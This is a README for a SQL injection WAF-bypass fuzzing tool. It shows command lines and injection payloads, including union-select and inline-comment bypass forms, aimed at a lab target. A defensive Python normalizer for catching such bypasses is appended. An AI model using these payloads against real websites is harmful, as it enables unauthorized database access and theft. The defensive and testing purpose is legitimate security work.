# sql_Bypass_WAF

A SQL injection WAF bypass tool: a fuzz-testing tool for getting past a WAF.

## Introduction

sql_Bypass_WAF is a SQL injection WAF bypass tool. It uses fuzzing to run a large number of tests and find statements that bypass the WAF.

## Overall workflow

1. Semi-automatic: a human has to determine which keyword the WAF is blocking and specify that keyword for fuzz testing.
2. The tool first requests the WAF block page once to capture its characteristics: response status code, response content length, and keywords in the body.
3. Fuzz testing then runs; if a response differs from the earlier block response in several respects, the bypass is considered successful.

## Bypass methods

Implemented bypass methods:

- Inline comments

More bypass methods will be added later.

## Usage

1. Use -h to view the parameter help.

![](./images/8.png)

2. First determine which malicious SQL statement the WAF blocks.

![](./images/1.png)

3. Then pass the statement you want to bypass into the tool. Note that the URL passed to the tool must be the one the WAF blocks.

If you are bypassing a single keyword, wrap it in "~", e.g.
```
http://192.168.170.133/sqli/less-1/?id=1' and 1=1 --+
after wrapping "and" in ~:
http://192.168.170.133/sqli/less-1/?id=1' ~and~ 1=1 --+
```

Example command:
```
sql_Bypass_WAF.exe -s "http://192.168.170.133/sqli/less-1/?id=1' ~and~ 1=1 --+"
```

![](./images/2.png)

![](./images/3.png)

If there are two keywords, put "^" between them, e.g.
```
http://192.168.170.133/sqli/less-1/?id=1' order by 1 --+
mark "order by" with ^:
http://192.168.170.133/sqli/less-1/?id=1' order^by 1 --+
```

Example command:
```
sql_Bypass_WAF.exe -s "http://192.168.170.133/sqli/less-1/?id=1' order^by 1 --+"
```

![](./images/4.png)

![](./images/5.png)

Fuzzing more than two keywords is not supported yet, but you can split the statement and test the parts one after another, e.g.:

```
test statement:
http://192.168.170.133/sqli/less-1/?id=-1' union select 1,database(),3 --+

first bypass "union select":
http://192.168.170.133/sqli/less-1/?id=-1' union^select 1,2,3 --+
statement after the bypass:
http://192.168.170.133/sqli/less-1/?id=-1' union/*////%//select 1,2,3 --+

then bypass "database()":
http://192.168.170.133/sqli/less-1/?id=-1' union/*////%//select 1,database^(),3 --+
```

![](./images/6.png)

![](./images/7.png)

## Planned features

1. Bypass for POST requests.
2. WAF identification.
3. Automatic generation of a tamper script after a successful bypass.
4. More bypass methods.
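The inline-comment method listed under "Bypass methods" works because a signature filter that matches raw request text never sees `union select` when the two words are separated by `/**/`. The defender-side counterpart is to normalize comments the way the database will before matching. The following is an added example, not code from the sql_Bypass_WAF project; the keyword patterns, the `normalize` and `find_keywords` functions, and the sample inputs are all constructed for illustration.

```python
import re

# Constructed keyword patterns of the kind a simple signature filter might use.
# They are matched against the statement AFTER comment normalization.
SUSPICIOUS_PATTERNS = {
    "union select": re.compile(r"\bunion\s+select\b", re.IGNORECASE),
    "order by":     re.compile(r"\border\s+by\b", re.IGNORECASE),
    "database()":   re.compile(r"\bdatabase\s*\(\s*\)", re.IGNORECASE),
}

# MySQL executable comments (/*!...*/ and /*!50000...*/) are run by the server,
# so their body must be kept and only the markers turned into whitespace.
EXEC_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.DOTALL)
# Ordinary block comments are ignored by the server; treat them as whitespace.
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)


def normalize(stmt: str) -> str:
    """Rewrite stmt into the form the SQL parser will effectively see."""
    stmt = EXEC_COMMENT.sub(r" \1 ", stmt)   # keep executable-comment bodies
    stmt = BLOCK_COMMENT.sub(" ", stmt)      # drop ordinary comments
    return re.sub(r"\s+", " ", stmt).strip() # collapse whitespace runs


def find_keywords(stmt: str, normalize_first: bool = True) -> list:
    """Return the names of the suspicious patterns found in stmt.

    With normalize_first=False this behaves like a naive filter matching on
    the raw text, which is exactly what inline-comment padding slips past.
    """
    text = normalize(stmt) if normalize_first else stmt
    return [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(text)]


if __name__ == "__main__":
    # Constructed sample inputs in the shape of the README's examples.
    samples = [
        "1' and 1=1 --+",
        "-1' union/**/select 1,2,3 --+",
        "1' order/*x*/by 1 --+",
        "-1' /*!50000union*//*!50000select*/ 1,database/**/(),3 --+",
    ]
    for s in samples:
        print(f"{s!r}")
        print(f"  raw match:        {find_keywords(s, normalize_first=False)}")
        print(f"  normalized match: {find_keywords(s)}")
```

Running the block shows the raw matcher returning nothing for the three comment-padded inputs while the normalized matcher flags each of them. This covers only the inline-comment method the README implements; a real WAF also has to apply URL and charset decoding and the other normalizations before this step, and should still treat any remaining `/*` in a parameter value as a signal worth logging.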